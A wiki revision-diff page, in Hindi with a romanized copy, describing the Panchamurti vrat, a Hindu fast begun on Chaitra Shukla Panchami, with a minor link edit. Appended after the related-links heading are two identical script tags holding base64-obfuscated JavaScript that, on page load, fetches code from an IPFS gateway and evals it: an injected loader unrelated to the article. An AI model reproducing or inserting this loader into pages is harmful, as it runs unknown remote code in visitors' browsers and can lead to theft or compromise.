Difference between revisions of "पंचमूर्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[चैत्र]] [[शुक्ल पक्ष]] की पंचमी पर आरम्भ होती है।
 
*[[चैत्र]] [[शुक्ल पक्ष]] की पंचमी पर आरम्भ होती है।
*उस दिन उपवास एवं शंख, चक्र, गदा, पद्म एवं पृथ्वी को चन्दन से एक वृत्त में खींचकर उनकी पूजा की जाती है।
+
*उस दिन उपवास एवं शंख, चक्र, [[गदा]], पद्म एवं पृथ्वी को चन्दन से एक वृत्त में खींचकर उनकी पूजा की जाती है।
 
*वर्ष भर प्रत्येक मास की पंचमी पर यह व्रत किया जाता है।
 
*वर्ष भर प्रत्येक मास की पंचमी पर यह व्रत किया जाता है।
 
*वर्ष के अन्त में पाँच रंगों के वस्त्रों का दान दिया जाता है।
 
*वर्ष के अन्त में पाँच रंगों के वस्त्रों का दान दिया जाता है।
Line 7: Line 7:
  
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 09:18, 14 May 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl paksh ki panchami par arambh hoti hai.
  • us din upavas evan shankh, chakr, gada, padm evan prithvi ko chandan se ek vritt mean khianchakar unaki pooja ki jati hai.
  • varsh bhar pratyek mas ki panchami par yah vrat kiya jata hai.
  • varsh ke ant mean paanch rangoan ke vastroan ka dan diya jata hai.
  • rajasooy ke saman puny milata hai.[1]


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 466-467, vishnudharmottar 3|155|1-7 se uddharan).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>